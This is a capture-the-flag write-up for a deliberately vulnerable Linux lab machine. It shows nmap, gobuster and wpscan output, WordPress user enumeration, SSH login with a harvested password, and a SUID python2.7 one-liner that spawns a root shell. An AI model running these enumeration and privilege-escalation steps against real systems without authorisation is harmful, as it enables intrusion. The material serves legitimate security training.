Table of Contents
- Target OS: Linux
- Rated Difficulty: Intermediate
ENUM >> NMAP
# Nmap 7.92 scan initiated Tue Feb 15 15:54:24 2022 as: nmap -sS -v -sV -oN nmap_initial 192.168.178.34
Nmap scan report for 192.168.178.34
Host is up (0.29s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 15 15:54:38 2022 -- 1 IP address (1 host up) scanned in 14.08 secondsENUM >> GoBuster scan on webroot
❯ gobuster dir -u http://192.168.178.34 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 20 -x php,html -b 403,404
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.178.34
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html
[+] Timeout: 10s
===============================================================
2022/02/15 17:19:50 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 11026]
/index.html (Status: 200) [Size: 11026]
/javascript (Status: 301) [Size: 321] [--> http://192.168.178.34/javascript/]
/phpmyadmin (Status: 301) [Size: 321] [--> http://192.168.178.34/phpmyadmin/]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.178.34/wordpress/]
===============================================================
2022/02/15 17:23:24 Finished
===============================================================- Deception is the key here… both
/phpmyadminand/wordpressare older versions, but not exactly exploitable…phpmyadminis a complete dead-end. However, besides a userlist, the/wordpressdirectory will point us to ahint.htmlif you scan the folder via GoBuster/FeroxBuster/dirbuster/etc… with any of theraft-ordirectory-list-wordlists and ensure you enablehtmlwith-xif using GoBuster):
ENUM >> wpscan on /wordpress
- Here is our two users to target:
❯ wpscan --url http://192.168.178.34/wordpress/ -t 20 -e vp,vt,u1-10
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <===============================================================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] yash
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] haclabs
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)LOOT >> hint.html in /wordpress
<html>
<body>
<p>Please collect all the API tokens availabe on the home page</p>
</body>
</html>- OK, easy enough…
LOOT >> API keys in /index.html
- These are found throughout the file hidden away in
<!--comments… simply searching the source for "API" will get you the below:
CREDS - API keys
PRIVESC >> ssh access to yash account
yashis the winner of the user-lotto:
❯ ssh yash@192.168.178.34
yash@192.168.178.34's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 5.0.0-23-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
...
opeartion going on=====================> Copy password to /haclabs
System compromised!!!ALERT
Copy operation aborted
yash@haclabs:~$PRIVESC >> SUID python
- SUID
python2.7binary – this one is pretty self-explanatory:
yash@haclabs:/tmp$ /usr/bin/python2.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
#